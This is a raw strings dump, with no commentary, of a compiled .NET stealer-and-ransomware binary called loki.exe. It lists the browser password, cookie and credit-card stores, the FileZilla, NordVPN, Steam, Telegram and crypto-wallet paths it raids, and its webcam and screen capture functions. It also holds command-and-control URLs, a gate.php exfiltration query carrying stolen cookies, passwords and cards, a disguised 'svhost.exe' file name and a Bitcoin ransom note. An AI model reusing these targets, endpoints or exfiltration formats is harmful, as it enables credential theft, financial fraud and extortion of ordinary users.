!This program cannot be run in DOS mode.
`.rsrc
@.reloc
{.q8s
02, 9
\.<8#
\.Y+s
v4.0.30319
#Strings
__StaticArrayInitTypeSize=10
<>9__15_0
<p3k>b__15_0
_003CGetNTVersion_003Eg__GetMngObj_007C7_0
smethod_0
byte_0
string_0
intptr_0
fileAttributes_0
object_0
uint_0
HMACSHA1
<>9__15_1
<p3k>b__15_1
_003CGetNTVersion_003Eg__GetOsVer_007C7_1
string_1
fileAttributes_1
Nullable`1
IEnumerable`1
ICollection`1
IComparer`1
IEnumerator`1
IList`1
Gecko1
<>7__wrap1
<>m__Finally1
<ToJsonPairEnumerable>d__12
Microsoft.Win32
user32
ToUInt32
ToInt32
<>9__15_2
<p3k>b__15_2
Func`2
KeyValuePair`2
IDictionary`2
SortedDictionary`2
Gecko2
<ToJsonValueEnumerable>d__13
Gecko3
ToUInt64
ToInt64
Gecko4
Gecko5
ToUInt16
ToInt16
Gecko6
Gecko7
get_UTF8
Gecko8
7D78CB380BF5EFB7B851409CA6A875F77DECF09D19B9149DA17A3EBF674BC0F9
Gecko9
<Module>
<PrivateImplementationDetails>
capCreateCaptureWindowA
berkeleyDB
Write_CC
Get_CC
get_OID
get_ID
set_ID
SPIF_SENDWININICHANGE
SPIF_UPDATEINIFILE
get_ASCII
get_formSubmitURL
set_formSubmitURL
NoiseMe.Drags.App.Models.JSON
FromJSON
ToJSON
System.IO
SPI_SETDESKWALLPAPER
get_NT
set_NT
get_IV
set_IV
get_DataIV
set_DataIV
value__
stringa
mozila
FileZilla
get_filezilla
System.Data
loki.loki.Stealer.WebData
GetRoadData
ProtectedData
EncryptedData
RoamingAppData
LocalAppData
get_ObjectData
set_ObjectData
get_RowData
set_RowData
Cookie_Grab
Passwords_Grab
mscorlib
fileAttrib
DecryptBlob
Savepublic
System.Collections.Generic
Microsoft.VisualBasic
<>3__kvpc
get_ManagedThreadId
get_CurrentManagedThreadId
<>l__initialThreadId
get_nextId
set_nextId
OpenRead
get_CurrentThread
Download
ItIsOdd
RijndaelManaged
get_timePasswordChanged
set_timePasswordChanged
Stretched
Centered
get_timesUsed
set_timesUsed
get_timeLastUsed
set_timeLastUsed
get_timeCreated
set_timeCreated
expected
get_id
set_id
get_guid
set_guid
get_passwordField
set_passwordField
get_usernameField
set_usernameField
<ID>k__BackingField
<OID>k__BackingField
<formSubmitURL>k__BackingField
<NT>k__BackingField
<DataIV>k__BackingField
<ObjectData>k__BackingField
<RowData>k__BackingField
<nextId>k__BackingField
<timePasswordChanged>k__BackingField
<timesUsed>k__BackingField
<timeLastUsed>k__BackingField
<timeCreated>k__BackingField
<id>k__BackingField
<guid>k__BackingField
<passwordField>k__BackingField
<usernameField>k__BackingField
<encryptedPassword>k__BackingField
<_masterPassword>k__BackingField
<Name>k__BackingField
<AstableName>k__BackingField
<encryptedUsername>k__BackingField
<hostname>k__BackingField
<Type>k__BackingField
<encType>k__BackingField
<ObjectType>k__BackingField
<Size>k__BackingField
<PageSize>k__BackingField
<SQLDataTypeSize>k__BackingField
<DataEncoding>k__BackingField
<ObjectLength>k__BackingField
<Passwordcheck>k__BackingField
<httpRealm>k__BackingField
<RootNum>k__BackingField
<Version>k__BackingField
<version>k__BackingField
<Identifier>k__BackingField
<Fields>k__BackingField
<DataEntries>k__BackingField
<logins>k__BackingField
<Objects>k__BackingField
<disabledHosts>k__BackingField
<SqlRows>k__BackingField
<Keys>k__BackingField
<_globalSalt>k__BackingField
<EntrySalt>k__BackingField
<_entrySalt>k__BackingField
<SqlStatement>k__BackingField
<DataArray>k__BackingField
<DataKey>k__BackingField
ClassItemField
ReadToEnd
Append
get_encryptedPassword
set_encryptedPassword
get__masterPassword
Cpassword
Replace
CreateInstance
instance
Sequence
source
GetTypeCode
GetHashCode
set_Mode
FileMode
PaddingMode
paddingMode
CryptoStreamMode
OpenMode
CipherMode
SelectSingleNode
XmlNode
get_Unicode
get_BigEndianUnicode
FromImage
get_Message
SendMessage
get_CurrentInputLanguage
AddRange
Invoke
DataTable
ReadTable
GetEnvironmentVariable
IEnumerable
ToJsonValueEnumerable
ToJsonPairEnumerable
IDisposable
IFormattable
ToDouble
get_Handle
RuntimeFieldHandle
RuntimeTypeHandle
GetTypeFromHandle
Rectangle
ToSingle
DownloadFile
UploadFile
ZipFile
GetFile
GetProfile
profile
Console
set_WindowStyle
ProcessWindowStyle
Profile_Name
User_Name
Browser_Name
get_Name
set_Name
fieldName
get_AstableName
set_AstableName
set_FileName
GetFileName
get_MachineName
baseName
GetLclName
get_FullName
get_UserName
className
GetName
get_LayoutName
get_DisplayName
profile_name
browser_name
get_encryptedUsername
set_encryptedUsername
get_hostname
set_hostname
DateTime
AppendLine
WriteLine
get_NewLine
Combine
NeedEscape
DataProtectionScope
dataProtectionScope
get_Type
set_Type
get_encType
set_encType
ChangeType
ValueType
get_JsonType
get_ObjectType
set_ObjectType
GetType
OpenShare
Compare
loki.loki.Utilies.Hardware
loki.loki.Ransomware
ransomware
System.Core
ReadCore
get_CurrentUICulture
defaultCulture
get_InvariantCulture
culture
ToTitleCase
FormatFirstLetterUpperCase
WebResponse
GetResponse
FileClose
System.IDisposable.Dispose
Browser_Parse
DataToParse
dataToParse
TryParse
Reverse
predicate
Create
<>1__state
Delete
loki.sqlite
CompilerGeneratedAttribute
UnverifiableCodeAttribute
DebuggableAttribute
IteratorStateMachineAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
ExtensionAttribute
SecurityPermissionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
ParamArrayAttribute
RuntimeCompatibilityAttribute
ToSByte
ReadByte
WriteByte
ToByte
get_Value
ParseValue
queryStringValue
ToJsonValue
get_HasValue
TryGetValue
defaultValue
RegistryHive
Recursive
JsonPrimitive
System.Collections.Generic.ICollection<System.Collections.Generic.KeyValuePair<System.String,NoiseMe.Drags.App.Models.JSON.JsonValue>>.Remove
strToRemove
loki.exe
get_Size
set_Size
get_PageSize
get_SQLDataTypeSize
get_BlockSize
set_BlockSize
get_KeySize
set_KeySize
Prev_Lf
LastIndexOf
get_Jpeg
System.Threading
set_Padding
get_DataEncoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
GetFormattedString
DoEscapeString
jsonString
ToString
GetString
OctetString
BitString
hexString
AddQueyString
Substring
ToCamelCasing
parsing
FileLocating
saving
System.Drawing
ComputeHash
Refresh
profilePath
CreateTempPath
GetTempPath
GetFolderPath
GetDirPath
DefaultPath
get_Width
get_Length
set_Length
get_ObjectLength
set_ObjectLength
get_RowLength
length
loki.loki
fuWinIni
StringToHGlobalAnsi
get_Passwordcheck
TransformFinalBlock
HasPeek
CalcVertical
NordVpn_Steal
BitcoinSteal
Marshal
credential
ToDecimal
get_Ordinal
ReadNumericLiteral
ReadStringLiteral
bitcoin_keshel
maxLevel
kernel32.dll
avicap32.dll
user32.dll
Write_Autofill
Get_Browser_Autofill
get_Autofill
mozila_still
IsNull
IsNotNull
System.Xml
get_CurrencySymbol
removeCurrencySymbol
GetWebCam
get_webcam
FileStream
get_BaseStream
GetResponseStream
CryptoStream
MemoryStream
stream
StealSteam
uParam
lpvParam
StealTelegram
Program
get_Item
set_Item
System.IO.Compression.FileSystem
SymmetricAlgorithm
HashAlgorithm
get_httpRealm
set_httpRealm
ICryptoTransform
get_RootNum
set_RootNum
ToBoolean
littleEndian
TimeSpan
CopyFromScreen
get_PrimaryScreen
screen
FileOpen
CookMhn
Column
get_Extension
StringExtension
IsNullExtension
GetExtension
GetNTVersion
get_Version
set_Version
get_FileVersion
Stealer_version
get_version
set_version
System.IO.Compression
System.Globalization
uAction
SecurityAction
op_Subtraction
System.Reflection
ValueCollection
ManagementObjectCollection
KeyCollection
op_Addition
CryptographicException
NotImplementedException
NotSupportedException
KeyNotFoundException
IndexOutOfRangeException
ArgumentNullException
SystemException
InvalidOperationException
ArgumentException
Txtnhfrn
ForceTo
CompareTo
CopyTo
FileInfo
GetHardwareInfo
ToCultureInfo
GetCultureInfo
FileSystemInfo
lpSystemInfo
FileVersionInfo
GetVersionInfo
MemberInfo
SystemParametersInfo
NumberFormatInfo
get_InvariantInfo
get_StartInfo
ProcessStartInfo
get_TextInfo
DirectoryInfo
PropertyInfo
Loki.Gecko
Cookies_Gecko
returnZero
Bitmap
grab_desktop
loki.loki.Utilies.App
System.Linq
ReadChar
PeekChar
ToChar
get_scr
Nord_Vpn_Grabber
grabber
Key4MagicNumber
StringReader
StreamReader
JavaScriptReader
TextReader
textReader
BinaryReader
reader
url_loader
SHA1CryptoServiceProvider
TripleDESCryptoServiceProvider
IFormatProvider
SBuilder
StringBuilder
SpecialFolder
Nord_Vpn_Decoder
Integer
ManagementObjectSearcher
get_Identifier
set_Identifier
ObjectIdentifier
loki.loki.Stealer
ToUpper
StringComparer
CurrentUser
StringWriter
StreamWriter
TextWriter
textWriter
BinaryWriter
BitConverter
ToLower
HomeDir
JsonError
IEnumerator
ManagementObjectEnumerator
System.Collections.Generic.IEnumerable<System.Collections.Generic.KeyValuePair<System.String,NoiseMe.Drags.App.Models.JSON.JsonValue>>.GetEnumerator
System.Collections.Generic.IEnumerable<NoiseMe.Drags.App.Models.JSON.JsonValue>.GetEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
CreateDecryptor
CreateEncryptor
<>3__arr
IntPtr
Graphics
System.Diagnostics
get_Fields
set_Fields
get_Bounds
loki.loki.Stealer.Credit_Cards
Get_Credit_Cards
loki.loki.Stealer.Passwords
Write_Passwords
GetPasswords
password_aes
SkipSpaces
System.Runtime.InteropServices
Microsoft.VisualBasic.CompilerServices
System.Runtime.CompilerServices
GetInstances
DebuggingModes
loki.loki.Stealer.Cookies
CCookies
GetCookies
loki.loki.Utilies
GetDirectories
get_DataEntries
set_DataEntries
ReadDataEntries
Loki.Utilities
GetProperties
ParseTables
ExpandEnvironmentVariables
GetFiles
EncryptFiles
NumberStyles
ReadAllLines
get_Attributes
set_Attributes
FileAttributes
GetAttributes
SetAttributes
ReadBytes
Rfc2898DeriveBytes
ReadAllBytes
WriteAllBytes
GetBytes
false_bytes
true_bytes
GetSizeInMegabytes
get_Values
GetValues
Strings
loki.sqlite.strings
Settings
FindPaths
Equals
loki.sqlite.nulls
System.Windows.Forms
domains
System.Collections.Generic.ICollection<System.Collections.Generic.KeyValuePair<System.String,NoiseMe.Drags.App.Models.JSON.JsonValue>>.Contains
get_logins
set_logins
System.Text.RegularExpressions
System.Security.Permissions
System.Collections
StringSplitOptions
FillLeftWithZeros
get_Chars
RuntimeHelpers
passwors
WIN32_Class
ManagementClass
OpenAccess
IsWow64Process
hProcess
RunProcess
GetCurrentProcess
get_Objects
set_Objects
loki.loki.Utilies.Wallets
ReadDataEntriesFromOffsets
FormatWithDecimalDigits
FormatWithoutDecimalDigits
decimalDigits
get_Exists
get_disabledHosts
set_disabledHosts
get_SqlRows
set_SqlRows
define_windows
get_Keys
RemoveAt
Concat
AppendFormat
ImageFormat
get_NumberFormat
Subtract
ManagementBaseObject
JsonObject
ManagementObject
Expect
Unprotect
FileGet
System.Net
System.Collections.IEnumerator.Reset
DateTimeOffset
minusRight
get_Height
Is64Bit
GetOSBit
op_Implicit
get__globalSalt
get_EntrySalt
get__entrySalt
lTRjlt
get_Default
DialogResult
OutputResult
result
UserAgent
get_agent
WebClient
System.Management
get_SqlStatement
set_SqlStatement
Environment
XmlDocument
System.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,NoiseMe.Drags.App.Models.JSON.JsonValue>>.Current
System.Collections.Generic.IEnumerator<NoiseMe.Drags.App.Models.JSON.JsonValue>.Current
System.Collections.IEnumerator.Current
System.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,NoiseMe.Drags.App.Models.JSON.JsonValue>>.get_Current
System.Collections.Generic.IEnumerator<NoiseMe.Drags.App.Models.JSON.JsonValue>.get_Current
System.Collections.IEnumerator.get_Current
<>2__current
get_Count
AutofillCount
CCCouunt
AESDecript
RansomwareCrypt
loki_decrypt
PasswordEncrypt
RidjinEncrypt
TrimStart
Insert
Convert
WebRequest
CC_List
Autofill_List
profile_list
browser_name_list
JsonExt
MoveNext
System.Text
ReadAllText
WriteAllText
get_InnerText
RegistryView
get_Now
fieldIndex
endIndex
startIndex
rowIndex
arrayIndex
MessageBox
get_DataArray
ReadByteArray
ConvertHexStringToByteArray
InitializeArray
JsonArray
ToArray
CopyArray
get_Key
set_Key
get_DataKey
set_DataKey
OpenSubKey
OpenBaseKey
privateKey
queryStringKey
ContainsKey
RegistryKey
loki.loki.Utilies.CryptoGrafy
System.Security.Cryptography
System.Collections.Generic.ICollection<System.Collections.Generic.KeyValuePair<System.String,NoiseMe.Drags.App.Models.JSON.JsonValue>>.IsReadOnly
System.Collections.Generic.ICollection<System.Collections.Generic.KeyValuePair<System.String,NoiseMe.Drags.App.Models.JSON.JsonValue>>.get_IsReadOnly
Multiply
CreateTempCopy
entropy
get_Directory
HomeDirectory
baseDirectory
CreateDirectory
CreateFromDirectory
TempDirectory
profilesDirectory
Registry
op_Equality
op_Inequality
System.Security
IsNullOrEmpty
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SkipVerification
WrapNonExceptionThrows
.NETFramework,Version=v4.6
FrameworkDisplayName
.NET Framework 4.6H
CNoiseMe.Drags.App.Models.JSON.JsonValue+<ToJsonPairEnumerable>d__12
DNoiseMe.Drags.App.Models.JSON.JsonValue+<ToJsonValueEnumerable>d__13
D:\PenTest\Stuff\Cerberus\C#_Source\obj\x86\Debug\loki.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
B'D0E1G
3;CZcw
2)3.4/
Win32_OperatingSystem
Version
Windows NT 10.0
Windows NT
\UserAgents.txt
LocalAppData
\Google\Chrome\User Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe
Mozilla/5.0 (
; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/
Safari/537.36
) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/
\Opera Software\Opera Stable\Web Data
HKEY_CURRENT_USER\Software\Classes\Applications\opera.exe\shell\open\command
67.0.3396.87
68.0.3440.106
69.0.3497.100
70.0.3538.102
Safari/537.36 OPR/55.0.2994.44
C:\Program Files\Mozilla Firefox\firefox.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
; Win64; x64; rv:
) Gecko/20100101 Firefox/
SEQUENCE {
{0:X2}
INTEGER
OCTETSTRING
OBJECTIDENTIFIER
Berkelet DB
00000002
1.85 (Hash, version 2, native byte-order)
Unknow database format
reader
extra characters in JSON input
Incomplete JSON input
JSON array must end with ']'
Unexpected character '{0}'
leading zeros are not allowed
Invalid JSON numeric literal; no digit found
Invalid JSON numeric literal; extra dot
Invalid JSON numeric literal; incomplete exponent
Invalid JSON string literal format
Invalid JSON string literal; incomplete escape sequence
Incomplete unicode character escape literal
Invalid JSON string literal; unexpected escape character
JSON string is not closed
Expected '{0}', got '{1}'
Expected '{0}', differed at {1}
{0}. At line {1}, column {2}
stream
GetFormattedString from value type
Infinity
-Infinity
textReader
Unexpected parser return type: {0}
jsonString
textWriter
\AX754VD.tmp
EAAAACVqp2nM14dESY0jhlwUEw5bVqzH/vco5e9/Ld/rxElb
EAAAAEcfZbo8Ae2vKKb8PMSvQxlw+mxJbzb2GO8VcvsLpsRT
KESHEL
http://droidsec.tk/loader.php
EAAAAMMhgJXYgyfZzRrISmrzNwdxmdyNJ/zdqt80PZ8/64bZ
http://droidsec.tk/
UNIQUE
Login Data
Web Data
Cookies
AppData\Roaming\
AppData\Local\
User Data
Unknown
\Browsers
%USERPROFILE%
AppData\Local
AppData\Roaming
\CamScreen.png
VFW Capture
CamEror
\Files\
\files
svhost.exe
\svhost.exe
\screen.jpeg
Wallets
Bitcoin
wallet.dat
Electrum
wallets
SELECT * FROM
SELECT * FROM CIM_OperatingSystem
Caption
Windows 8
Windows 8.1
Windows 10
Windows XP
Windows 7
Server
Windows Server
SOFTWARE\Microsoft\Cryptography
Key Not Found: {0}
MachineGuid
Index Not Found: {0}
HWID not found
root\CIMV2
SELECT * FROM Win32_Product
Select * from Win32_ComputerSystem
NumberOfLogicalProcessors
http://ip-api.com/line/?fields
\R725K54.tmp
aguidthatIgotonthewire==
SELECT * FROM Win32_Processor
SELECT * FROM Win32_NetworkAdapterConfiguration
MACAddress
SELECT * FROM Win32_VideoController
SELECT * FROM Win32_PhysicalMemory
C:\Program Files\Mozilla Firefox\\firefox.exe
\information.log
Country Code :
Country :
State Name :
City :
Timezone :
ZIP :
ISP :
Coordinates :
Username :
PCName :
UUID :
HWID :
CPU :
CPU Threads:
GPU :
Screen Resolution :
System Language :
Layout Language :
PC Time :
Browser Versions
Mozilla Version:
Chrome Version:
Opera Version:
Popular Browsers Not Found!
gate.php?id={0}&os={1}&cookie={2}&pswd={3}&version={4}&cc={5}&autofill={6}&hwid={7}
sifreliMetin
Stream did not contain properly formatted byte array
Did not read byte array properly
EAAAALZtWlYn5RSRzzQv25kWmX6INGcLlC5iBzugw0VI7IKL + 7wOaADOJ/daOYUHJx8wkw==
goisjgpoerkjgokkbjiushgporwagmwibuts0gp[mvkntiusopjfij
4326443888886662222
\Filezilla\recentservers.xml
\Apps\FileZilla\filezilla_recentservers.xml
\Filezilla\sitemanager.xml
\Apps\FileZilla
\Apps\FileZilla\filezilla_sitemanager.xml
\Apps\Vpn
\Apps\Vpn\NordVPN\Account.txt
NordVPN
NordVpn.exe*
Found version
user.config
//setting[@name='Username']/value
//setting[@name='Password']/value
Username:
Password:
\Apps\Steam
Apps\Steam
HKEY_CURRENT_USER\SOFTWARE\Valve\Steam
Steampath
\config\config.vdf
\config.vdf
\config\loginusers.vdf
\loginusers.vdf
\config\SteamAppData.vdf
\SteamAppData.vdf
Software\Classes\tdesktop.tg\DefaultIcon
\Telegram
Telegram
key3.db
key4.db
cookies.sqlite
logins.json
tempDataBase
moz_cookies
isSecure
expiry
\Browsers\
_Cookies.txt
logins
encryptedUsername
encryptedPassword
[^\u0020-\u007F]
Site_Url :
hostname
Login :
Password :
Browser :
Profile :
metaData
item2)
nssPrivate
The binary key cannot have an odd number of digits: {0}
Profiles
AppData\Local\Temp
autofill
Name :
Value :
_Autofill.log
origin_url
username_value
password_value
\passwords.log
\cookieDomains.log
credit_cards
name_on_card
Ex_Month And Year:
expiration_month
expiration_year
Card_Number
card_number_encrypted
Profie :
_Credit_Cards.log
cookies
host_key
httponly
secure
expires_utc
encrypted_value
ProgramData
\HowToDecrypt.txt
IMPORTANT INFORMATION!!!!
All your files are encrypted with Loki stealer:
To Decrypt:
- Send 0.02 BTC to:
- Follow All Steps
IMPORTANT INFORMATION!!!!
All your files are encrypted with Loki stealer:
- Follow All Steps
ugsojfsoejoigjwpfdsfmisofjksepfselfs[gkreopf
password-check
global-salt
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
loki.exe
LegalCopyright
OriginalFilename
loki.exe
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0